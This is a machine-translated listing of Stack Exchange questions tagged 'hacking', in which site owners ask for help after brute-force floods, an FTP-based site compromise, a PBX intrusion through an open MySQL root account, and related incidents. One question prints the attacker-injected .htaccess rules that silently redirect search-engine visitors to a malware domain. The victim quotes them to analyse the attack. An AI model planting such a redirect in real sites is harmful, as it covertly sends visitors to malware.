Questions tagged «hacking»

黑客攻击是通过利用服务器或网络安全性的弱点来进行的。

5
我的网站最近遭到攻击。我该怎么办?
这是我的第一次。我经营的网站之一最近遭到攻击。根本不是聪明的攻击-纯蛮力-击中每个页面和每个非页面以及可能的扩展。将垃圾数据发布到每种表单,并尝试发布到一些随机URL。全部tod,一小时内请求16000次。 我应该怎么做才能防止/警告这种行为?有没有办法限制给定IP /客户端的请求/小时? 我应该向用户报告的地方吗?他们似乎来自中国,并留下了有效的电子邮件。
10 security  hacking 

5
Matasano是如何被黑客入侵的?
来自:http : //seclists.org/fulldisclosure/2009/Jul/0388.html 如果我从以下网站上的帖子中最好地理解它:http : //news.ycombinator.com/item?id=723798,Matasano团队让sshd可以访问Internet-从编程的角度来看,有什么建议的解决方案?

2
通过受感染的FTP帐户剖析网站攻击
我的网站已被黑客入侵,目前,我知道一些细节,但对于确切的发生方式或将来如何阻止它,我一无所知。我需要您的帮助来剖析攻击,以防止再次发生。这有点长,但是我想确保提供足够的信息来帮助解决问题。 这是发生了什么事。 几周前,我收到托管公司GoDaddy的电子邮件,说我的网站使用了太多资源,他们期望MySQL查询是罪魁祸首。有问题的查询是其中包含5-6个字词的搜索查询。我设置的方式越多,搜索的词越多,查询变得越复杂。没问题。我已修复它,但与此同时,GoDaddy也暂时关闭了我的帐户,大约3天后一切恢复正常。 发生此事件后,我的搜索引擎流量急剧下降了大约90%。我很没想到,它很烂,将其写到惨败的查询中,并确定它会在Google重新抓取该网站后及时返回。没有。 几天前,我收到用户的电子邮件,说我的网站托管了恶意软件。我直接在浏览器中加载了该网站,但没有看到任何内容注入该页面。然后,我检查了.htaccess文件,发现了以下内容: <IfModule mod_rewrite.c> RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC] RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=584 …

3
远程访问不安全的MySQL'root'@'localhost'帐户?
一点背景知识:我们刚刚将PBX系统入侵了。服务器本身看起来很安全(没有登录的未经授权的控制台访问-SSH等),但是黑客设法以某种方式向PBX软件(FreePBX,由MySQL支持)注入了新的管理员用户。Apache日志表明,黑客设法在不使用Web界面(或Web界面中的任何漏洞利用)的情况下添加了用户。 现在,我发现MySQL在没有root密码(!!)的情况下运行并公开绑定到外部IP地址(显然,我现在已将其锁定)。但是,MySQL中唯一的根级别用户是'root'@'localhost'和'root'@'127.0.0.1',这两个都只能在本地访问。 所以,我的问题是这样的: 有没有一种欺骗与MySQL的连接的方法,从而允许从远程IP地址连接到“ root” @“ localhost”用户,而无需在本地运行任何其他利用程序? 作为参考,该框是运行Mysql 5.0.95的Centos 5(Linux 2.6.10)。

4
基于每秒100次尝试的Web服务器最低密码安全性
这篇有见地的文章建议密码不必非常安全:http : //www.baekdal.com/tips/password-security-usability? 我在这里发现一条令人困扰的特定行: 实际数量有所不同,但是大多数Web应用程序每秒将无法处理100个以上的登录请求。 确实,大多数Web应用程序仅需要能够防止每秒100次尝试吗?当您处理可被多个入侵者攻击的分布式系统时,数量似乎很少。 编辑 关于我的问题的更多说明:根据大多数Web服务器的当前平均性能,在暴力攻击期间最大可能的登录尝试次数是多少?我不是在问离线密码攻击,因为有人可以真正发起登录尝试。 放眼来看,假设您有一个无法使用tar-pitting或临时帐户禁用(以防止黑客通过登录尝试进行DoS攻击)的系统,即基于Web的系统每秒的实际登录尝试次数非常有用

1
ld库问题
在检查任何服务的状态或停止在我的linux服务器上启动任何服务器时,出现以下错误。其CentOS-5.4服务器。 sh: /usr/bin/(swapd): /lib/ld-linux.so.1: bad ELF interpreter: No such file or directory 我检查了ls -l / lib / ld *,下面是o / p -rwxr-xr-x 1 root root 129832 Oct 25 19:16 ld-2.5.so lrwxrwxrwx 1 root root 9 Nov 24 02:14 ld-linux.so.2 -> ld-2.5.so lrwxrwxrwx 1 root root 13 Nov 24 02:14 ld-lsb.so.3 …
By using our site, you acknowledge that you have read and understand our Cookie Policy and Privacy Policy.
Licensed under cc by-sa 3.0 with attribution required.